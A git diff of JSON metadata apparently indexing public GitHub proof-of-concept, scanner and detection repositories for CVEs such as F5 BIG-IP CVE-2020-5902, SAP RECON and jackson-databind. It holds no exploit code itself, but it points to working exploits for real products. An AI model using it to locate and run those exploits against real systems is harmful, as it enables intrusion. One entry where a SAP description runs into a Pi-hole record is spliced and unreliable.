"pushed_at": "2020-07-10T07:54:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278670349, + "name": "f5-bigip-rce-cve-2020-5902", + "full_name": "theLSA\/f5-bigip-rce-cve-2020-5902", + "owner": { + "login": "theLSA", + "id": 28248956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28248956?v=4", + "html_url": "https:\/\/github.com\/theLSA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theLSA\/f5-bigip-rce-cve-2020-5902", + "description": "F5 BIG-IP RCE CVE-2020-5902 automatic check tool", + "fork": false, + "created_at": "2020-07-10T15:33:00Z", + "updated_at": "2024-08-12T20:03:34Z", + "pushed_at": "2020-07-12T10:36:20Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "big-ip", + "cve-2020-5902", + "f5", + "rce", + "tmui" + ], + "visibility": "public", + "forks": 17, + "watchers": 61, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 278872817, + "name": "CVE-2020-5902", + "full_name": "flyopenair\/CVE-2020-5902", + "owner": { + "login": "flyopenair", + "id": 25229453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25229453?v=4", + "html_url": "https:\/\/github.com\/flyopenair", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flyopenair\/CVE-2020-5902", + "description": "Exploits for CVE-2020-5902 POC ", + "fork": false, + "created_at": "2020-07-11T14:01:06Z", + "updated_at": "2020-07-11T14:01:08Z", + "pushed_at": "2020-07-10T13:24:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278872820, + "name": "CVE-2020-5902", + "full_name": "Al1ex\/CVE-2020-5902", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-5902", + "description": "CVE-2020-5902", + "fork": false, + "created_at": "2020-07-11T14:01:08Z", + "updated_at": "2024-08-12T20:03:37Z", + "pushed_at": "2020-07-11T14:12:18Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-5902", + "f5-big-ip" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 279017452, + "name": "CVE-2020-5902-fofa-scan", + "full_name": "freeFV\/CVE-2020-5902-fofa-scan", + "owner": { + "login": "freeFV", + "id": 32540878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32540878?v=4", + "html_url": "https:\/\/github.com\/freeFV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeFV\/CVE-2020-5902-fofa-scan", + "description": null, + "fork": false, + "created_at": "2020-07-12T07:49:18Z", + "updated_at": "2021-04-11T14:53:19Z", + "pushed_at": "2020-07-09T08:06:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 279083082, + "name": "cve-2020-5902", + "full_name": "momika233\/cve-2020-5902", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/cve-2020-5902", + "description": null, + "fork": false, + "created_at": "2020-07-12T14:37:25Z", + "updated_at": "2024-08-12T20:03:40Z", + "pushed_at": "2020-07-12T14:40:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 280314712, + "name": "CVE-2020-5902-rce-gui", + "full_name": "rockmelodies\/CVE-2020-5902-rce-gui", + "owner": { + "login": "rockmelodies", + "id": 24653177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653177?v=4", + "html_url": "https:\/\/github.com\/rockmelodies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockmelodies\/CVE-2020-5902-rce-gui", + "description": "GUI", + "fork": false, + "created_at": "2020-07-17T03:13:30Z", + "updated_at": "2021-01-08T00:17:22Z", + "pushed_at": "2020-07-17T08:09:30Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 281204236, + "name": "cve-2020-5902-ioc-bigip-checker", + "full_name": "f5devcentral\/cve-2020-5902-ioc-bigip-checker", + "owner": { + "login": "f5devcentral", + "id": 18314976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18314976?v=4", + "html_url": "https:\/\/github.com\/f5devcentral", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f5devcentral\/cve-2020-5902-ioc-bigip-checker", + "description": null, + "fork": false, + "created_at": "2020-07-20T19:10:09Z", + "updated_at": "2024-08-12T20:03:56Z", + "pushed_at": "2020-08-24T03:44:29Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 17, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 283054636, + "name": "CVE-2020-5902-F5BigIP", + "full_name": "corelight\/CVE-2020-5902-F5BigIP", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2020-5902-F5BigIP", + "description": "A network detection package for CVE-2020-5902, a CVE10.0 vulnerability affecting F5 Networks, Inc BIG-IP devices.", + "fork": false, + "created_at": "2020-07-28T00:43:14Z", + "updated_at": "2024-08-12T20:04:12Z", + "pushed_at": "2020-11-12T06:17:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 286226256, + "name": "CVE-2020-5902-Scanner", + "full_name": "PushpenderIndia\/CVE-2020-5902-Scanner", + "owner": { + "login": "PushpenderIndia", + "id": 56433698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56433698?v=4", + "html_url": "https:\/\/github.com\/PushpenderIndia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PushpenderIndia\/CVE-2020-5902-Scanner", + "description": "Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3", + "fork": false, + "created_at": "2020-08-09T11:46:23Z", + "updated_at": "2024-08-12T20:04:33Z", + "pushed_at": "2021-12-17T11:40:03Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 287223574, + "name": "CVE-2020-5902", + "full_name": "murataydemir\/CVE-2020-5902", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-5902", + "description": "[CVE-2020-5902] F5 BIG-IP Remote Code Execution (RCE)", + "fork": false, + "created_at": "2020-08-13T08:27:25Z", + "updated_at": "2024-08-12T20:04:40Z", + "pushed_at": "2020-08-30T00:23:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 288487774, + "name": "cve-2020-5902", + "full_name": "superzerosec\/cve-2020-5902", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/cve-2020-5902", + "description": null, + "fork": false, + "created_at": "2020-08-18T15:04:08Z", + "updated_at": "2020-08-18T15:04:33Z", + "pushed_at": "2020-08-18T15:04:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 294219427, + "name": "BIG-IP-F5-TMUI-RCE-Vulnerability", + "full_name": "ludy-dev\/BIG-IP-F5-TMUI-RCE-Vulnerability", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/BIG-IP-F5-TMUI-RCE-Vulnerability", + "description": "(CVE-2020-5902) BIG IP F5 TMUI RCE Vulnerability RCE PoC\/ Test Script ", + "fork": false, + "created_at": "2020-09-09T20:15:03Z", + "updated_at": "2020-11-07T10:08:19Z", + "pushed_at": "2020-11-07T10:08:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 336016319, + "name": "F5-BIG-IP-CVE-2020-5902-shodan-scanner", + "full_name": "faisalfs10x\/F5-BIG-IP-CVE-2020-5902-shodan-scanner", + "owner": { + "login": "faisalfs10x", + "id": 51811615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4", + "html_url": "https:\/\/github.com\/faisalfs10x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faisalfs10x\/F5-BIG-IP-CVE-2020-5902-shodan-scanner", + "description": "simple bash script of F5 BIG-IP TMUI Vulnerability CVE-2020-5902 checker", + "fork": false, + "created_at": "2021-02-04T16:36:21Z", + "updated_at": "2023-04-22T21:33:25Z", + "pushed_at": "2021-02-04T17:38:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bigip", + "cve-2020-5902", + "exploit", + "poc" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 357452088, + "name": "CVE-2020-5902", + "full_name": "haisenberg\/CVE-2020-5902", + "owner": { + "login": "haisenberg", + "id": 64567828, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64567828?v=4", + "html_url": "https:\/\/github.com\/haisenberg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haisenberg\/CVE-2020-5902", + "description": "Auto exploit RCE CVE-2020-5902 ", + "fork": false, + "created_at": "2021-04-13T06:48:20Z", + "updated_at": "2024-08-12T20:12:06Z", + "pushed_at": "2021-04-13T21:13:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497326298, + "name": "F5-BIG-IP-POC", + "full_name": "west9b\/F5-BIG-IP-POC", + "owner": { + "login": "west9b", + "id": 103512651, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103512651?v=4", + "html_url": "https:\/\/github.com\/west9b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/west9b\/F5-BIG-IP-POC", + "description": "CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合", + "fork": false, + "created_at": "2022-05-28T13:30:22Z", + "updated_at": "2023-09-13T08:48:13Z", + "pushed_at": "2022-07-30T00:16:29Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 511566999, + "name": "CVE-2020-5902", + "full_name": "z3n70\/CVE-2020-5902", + "owner": { + "login": "z3n70", + "id": 39817707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39817707?v=4", + "html_url": "https:\/\/github.com\/z3n70", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3n70\/CVE-2020-5902", + "description": "BIGIP CVE-2020-5902 Exploit POC and automation scanning vulnerability", + "fork": false, + "created_at": "2022-07-07T14:48:08Z", + "updated_at": "2024-07-09T19:48:21Z", + "pushed_at": "2022-07-07T15:01:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bigip", + "bugbounty", + "cve", + "cybersecurity", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 577662602, + "name": "APT-Backpack", + "full_name": "34zY\/APT-Backpack", + "owner": { + "login": "34zY", + "id": 55347142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55347142?v=4", + "html_url": "https:\/\/github.com\/34zY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/34zY\/APT-Backpack", + "description": "cve-2019-11510, cve-2019-19781, cve-2020-5902,               cve-2021-1497, cve-2021-20090, cve-2021-22006, cve-2021-22205, cve-2021-26084, cve-2021-26855, cve-2021-26857, cve-2021–26857, cve-2021–26858, cve-2021–26865", + "fork": false, + "created_at": "2022-12-13T08:41:44Z", + "updated_at": "2024-11-05T01:37:50Z", + "pushed_at": "2023-04-19T17:10:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 598558288, + "name": "CVE-2020-5902", + "full_name": "amitlttwo\/CVE-2020-5902", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2020-5902", + "description": "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.", + "fork": false, + "created_at": "2023-02-07T11:07:23Z", + "updated_at": "2024-07-09T19:48:49Z", + "pushed_at": "2023-02-07T11:12:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-5903.json b/2020/CVE-2020-5903.json new file mode 100644 index 0000000000..5387f972c9 --- /dev/null +++ b/2020/CVE-2020-5903.json @@ -0,0 +1,33 @@ +[ + { + "id": 290087949, + "name": "CVE-2020-5903", + "full_name": "ltvthang\/CVE-2020-5903", + "owner": { + "login": "ltvthang", + "id": 5304208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5304208?v=4", + "html_url": "https:\/\/github.com\/ltvthang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ltvthang\/CVE-2020-5903", + "description": "CVE-2020-5902", + "fork": false, + "created_at": "2020-08-25T02:07:41Z", + "updated_at": "2020-10-25T06:02:24Z", + "pushed_at": "2020-07-08T06:33:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-6207.json b/2020/CVE-2020-6207.json new file mode 100644 index 0000000000..90cc34b6ae --- /dev/null +++ b/2020/CVE-2020-6207.json @@ -0,0 +1,33 @@ +[ + { + "id": 329585845, + "name": "SAP_EEM_CVE-2020-6207", + "full_name": "chipik\/SAP_EEM_CVE-2020-6207", + "owner": { + "login": "chipik", + "id": 6584277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6584277?v=4", + "html_url": "https:\/\/github.com\/chipik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chipik\/SAP_EEM_CVE-2020-6207", + "description": "PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)", + "fork": false, + "created_at": "2021-01-14T10:49:40Z", + "updated_at": "2024-08-12T20:09:25Z", + "pushed_at": "2021-01-15T16:25:19Z", + "stargazers_count": 81, + "watchers_count": 81, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 81, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-6286.json b/2020/CVE-2020-6286.json new file mode 100644 index 0000000000..08dea0f97b --- /dev/null +++ b/2020/CVE-2020-6286.json @@ -0,0 +1,33 @@ +[ + { + "id": 287230779, + "name": "CVE-2020-6286", + "full_name": "murataydemir\/CVE-2020-6286", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-6286", + "description": "[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Directory Traversal", + "fork": false, + "created_at": "2020-08-13T09:00:12Z", + "updated_at": "2024-08-12T20:04:40Z", + "pushed_at": "2020-08-29T23:49:49Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-6287.json b/2020/CVE-2020-6287.json new file mode 100644 index 0000000000..efcb63a0d5 --- /dev/null +++ b/2020/CVE-2020-6287.json @@ -0,0 +1,219 @@ +[ + { + "id": 279903611, + "name": "SAP_RECON", + "full_name": "chipik\/SAP_RECON", + "owner": { + "login": "chipik", + "id": 6584277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6584277?v=4", + "html_url": "https:\/\/github.com\/chipik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chipik\/SAP_RECON", + "description": "PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)", + "fork": false, + "created_at": "2020-07-15T15:20:09Z", + "updated_at": "2024-11-28T05:56:23Z", + "pushed_at": "2020-09-29T17:20:12Z", + "stargazers_count": 216, + "watchers_count": 216, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 64, + "watchers": 216, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 281199347, + "name": "CVE-2020-6287-exploit", + "full_name": "duc-nt\/CVE-2020-6287-exploit", + "owner": { + "login": "duc-nt", + "id": 61867814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61867814?v=4", + "html_url": "https:\/\/github.com\/duc-nt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duc-nt\/CVE-2020-6287-exploit", + "description": "PoC for CVE-2020-6287 The PoC in python for add user only, no administrator permission set. Inspired by @zeroSteiner from metasploit. Original Metasploit PR module: https:\/\/github.com\/rapid7\/metasploit-framework\/pull\/13852\/commits\/d1e2c75b3eafa7f62a6aba9fbe6220c8da97baa8 This PoC only create user with unauthentication permission and no more administrator permission set. This project is created only for educational purposes and cannot be used for law violation or personal gain. The author of this project is not responsible for any possible harm caused by the materials of this project. Original finding: CVE-2020-6287: Pablo Artuso CVE-2020-6286: Yvan 'iggy' G. Usage: python sap-CVE-2020-6287-add-user.py = 4.3.2", + "fork": false, + "created_at": "2020-08-04T10:23:28Z", + "updated_at": "2023-09-08T18:10:55Z", + "pushed_at": "2020-08-05T22:38:53Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 285586960, + "name": "CVE-2020-8816", + "full_name": "team0se7en\/CVE-2020-8816", + "owner": { + "login": "team0se7en", + "id": 49656318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49656318?v=4", + "html_url": "https:\/\/github.com\/team0se7en", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/team0se7en\/CVE-2020-8816", + "description": "Pi-hole ( <= 4.3.2) authenticated remote code execution.", + "fork": false, + "created_at": "2020-08-06T14:04:54Z", + "updated_at": "2020-08-12T09:35:48Z", + "pushed_at": "2020-08-06T15:14:12Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-8811", + "exploit", + "golang", + "pi-hole", + "privesc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-8825.json b/2020/CVE-2020-8825.json new file mode 100644 index 0000000000..4fee820380 --- /dev/null +++ b/2020/CVE-2020-8825.json @@ -0,0 +1,38 @@ +[ + { + "id": 239451773, + "name": "CVE-2020-8825", + "full_name": "hacky1997\/CVE-2020-8825", + "owner": { + "login": "hacky1997", + "id": 35650583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35650583?v=4", + "html_url": "https:\/\/github.com\/hacky1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacky1997\/CVE-2020-8825", + "description": "VanillaForum 2.6.3 allows stored XSS.", + "fork": false, + "created_at": "2020-02-10T07:24:37Z", + "updated_at": "2024-08-12T19:57:33Z", + "pushed_at": "2022-10-01T11:06:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-8825", + "php7", + "xss-poc", + "xss-vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-8835.json b/2020/CVE-2020-8835.json new file mode 100644 index 0000000000..a783a9ced8 --- /dev/null +++ b/2020/CVE-2020-8835.json @@ -0,0 +1,157 @@ +[ + { + "id": 263388909, + "name": "Exploitation-CVE-2020-8835", + "full_name": "Prabhashaka\/Exploitation-CVE-2020-8835", + "owner": { + "login": "Prabhashaka", + "id": 62282233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62282233?v=4", + "html_url": "https:\/\/github.com\/Prabhashaka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Prabhashaka\/Exploitation-CVE-2020-8835", + "description": null, + "fork": false, + "created_at": "2020-05-12T16:18:31Z", + "updated_at": "2022-03-28T07:58:29Z", + "pushed_at": "2020-05-12T16:23:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277140244, + "name": "Rick_write_exp_CVE-2020-8835", + "full_name": "snappyJack\/Rick_write_exp_CVE-2020-8835", + "owner": { + "login": "snappyJack", + "id": 16055573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16055573?v=4", + "html_url": "https:\/\/github.com\/snappyJack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snappyJack\/Rick_write_exp_CVE-2020-8835", + "description": null, + "fork": false, + "created_at": "2020-07-04T15:51:14Z", + "updated_at": "2023-07-24T12:01:24Z", + "pushed_at": "2020-07-04T16:40:18Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 299816602, + "name": "CVE-2020-8835", + "full_name": "zilong3033\/CVE-2020-8835", + "owner": { + "login": "zilong3033", + "id": 13643930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13643930?v=4", + "html_url": "https:\/\/github.com\/zilong3033", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zilong3033\/CVE-2020-8835", + "description": null, + "fork": false, + "created_at": "2020-09-30T05:21:40Z", + "updated_at": "2023-11-18T03:10:51Z", + "pushed_at": "2020-09-18T10:03:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 305013237, + "name": "CVE-2020-8835", + "full_name": "SplendidSky\/CVE-2020-8835", + "owner": { + "login": "SplendidSky", + "id": 12770529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12770529?v=4", + "html_url": "https:\/\/github.com\/SplendidSky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SplendidSky\/CVE-2020-8835", + "description": null, + "fork": false, + "created_at": "2020-10-18T03:17:58Z", + "updated_at": "2020-10-18T09:12:40Z", + "pushed_at": "2020-10-18T09:12:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 373897544, + "name": "CVE-2020-8835-verification", + "full_name": "digamma-ai\/CVE-2020-8835-verification", + "owner": { + "login": "digamma-ai", + "id": 29720627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29720627?v=4", + "html_url": "https:\/\/github.com\/digamma-ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/digamma-ai\/CVE-2020-8835-verification", + "description": "Formal verification example for CVE-2020-8835", + "fork": false, + "created_at": "2021-06-04T16:15:21Z", + "updated_at": "2022-02-05T02:10:04Z", + "pushed_at": "2021-06-08T21:42:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-8840.json b/2020/CVE-2020-8840.json new file mode 100644 index 0000000000..5ffef1bb3a --- /dev/null +++ b/2020/CVE-2020-8840.json @@ -0,0 +1,188 @@ +[ + { + "id": 242176659, + "name": "jackson-CVE-2020-8840", + "full_name": "jas502n\/jackson-CVE-2020-8840", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/jackson-CVE-2020-8840", + "description": "FasterXML\/jackson-databind 远程代码执行漏洞", + "fork": false, + "created_at": "2020-02-21T15:58:25Z", + "updated_at": "2024-08-12T19:57:58Z", + "pushed_at": "2020-02-21T16:03:28Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + 